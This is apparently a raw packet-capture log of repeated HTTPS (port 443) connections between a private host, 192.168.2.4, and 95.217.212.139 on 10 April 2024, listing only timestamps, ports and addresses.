                                                                                                                                                                                                          Apr 10, 2024 08:56:31.733939886 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.734014034 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.734051943 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.735090971 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.773170948 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.773237944 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.773293972 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.773324966 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.773344994 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.773370028 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.809278965 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.809350967 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.809397936 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.809425116 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.809456110 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.809516907 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.847795963 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.847867966 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.847903013 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.847919941 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.847951889 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.848402977 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886157990 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886287928 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886385918 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886456966 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886502981 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.886842966 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.918991089 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919131041 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919287920 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919322968 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.919553995 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941817999 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941886902 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941952944 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.941983938 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.942013979 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.942034960 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964484930 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964560032 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964620113 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964652061 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964689970 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.964708090 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983513117 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983591080 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983673096 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983695984 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983726978 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:31.983757019 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002336025 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002407074 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002496004 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002542973 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002652884 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.002911091 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021740913 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021816015 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021879911 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021919966 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021946907 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.021979094 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.038481951 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.038548946 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.038603067 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.038686037 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.038743973 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.038743973 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.053109884 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.053183079 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.053229094 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.053260088 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.053293943 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.053316116 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.068387985 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.068464994 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.068520069 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.068598032 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.068641901 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.068664074 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.084007025 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.084074020 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.084110022 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.084122896 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.084147930 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.084172964 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.097038031 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.097120047 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.097162962 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.097193956 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.097212076 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.097243071 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.110727072 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.110779047 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.110841990 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.110881090 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.110925913 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.110925913 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.122961998 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.123004913 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.123066902 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.123090982 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.123121977 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.123145103 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.136681080 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.136724949 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.136801004 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.136816978 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.136848927 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.136868000 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.147874117 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.147923946 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.148010015 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.148026943 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.148085117 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.159631968 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.159679890 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.159730911 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.159744978 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.159950972 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.159950972 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.171895027 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.171940088 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.172013044 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.172032118 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.172066927 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.172091007 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.181943893 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.181982994 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.182044029 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.182059050 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.182096958 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.182126045 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.191714048 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.191756010 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.191807985 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.191870928 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.191912889 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.191941977 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.201761961 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.201806068 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.201862097 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.201881886 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.201913118 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.201929092 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.212338924 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.212378979 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.212424040 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.212455034 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.212475061 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.212503910 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.221062899 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.221116066 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.221172094 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.221184969 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.221230984 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.221242905 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.230334997 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.230377913 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.230432034 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.230468988 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.230508089 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.230529070 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.237699986 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.237746000 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.237795115 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.237816095 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.237844944 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.237864017 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.246666908 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.246707916 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.246752977 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.246778965 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.246810913 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.246836901 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.254144907 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.254188061 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.254240990 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.254256964 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.254286051 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.254300117 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.262492895 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.262536049 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.262594938 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.262626886 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.262662888 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.262689114 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.270005941 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.270046949 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.270097017 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.270147085 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.270185947 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.270214081 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.277010918 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.277053118 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.277112961 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.277158976 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.277190924 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.277215958 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.284401894 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.284444094 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.284495115 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.284503937 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.284553051 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.290841103 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.290883064 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.290958881 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.290973902 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.290999889 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.291052103 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296490908 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296550989 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296586037 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296597958 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296626091 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296644926 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296700954 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.296761990 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.297171116 CEST49758443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.297204971 CEST4434975895.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.351444006 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.351479053 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.351567030 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.351887941 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.351908922 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.756140947 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.756300926 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.757113934 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.757131100 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.757297039 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:32.757311106 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.394433022 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.394500971 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.394529104 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.394750118 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.394793034 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.394881964 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.482342005 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.482414961 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.482573032 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.482610941 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.482676029 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.613142967 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.613230944 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.613254070 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.613293886 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.613351107 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.613351107 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.705077887 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.705204010 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.705252886 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.705276966 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.705307961 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.705357075 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.771874905 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.771946907 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.772043943 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.772089958 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.772128105 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.772154093 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.817532063 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.817661047 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.817877054 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.817939997 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.818123102 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.857825994 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.857889891 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.858278036 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.858342886 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.858515978 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.894984007 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.895049095 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.895427942 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.895492077 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.895675898 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.934197903 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.934264898 CEST4434975995.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.934556961 CEST49759443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:33.934623003 CEST4434975995.217.212.139192.168.2.4
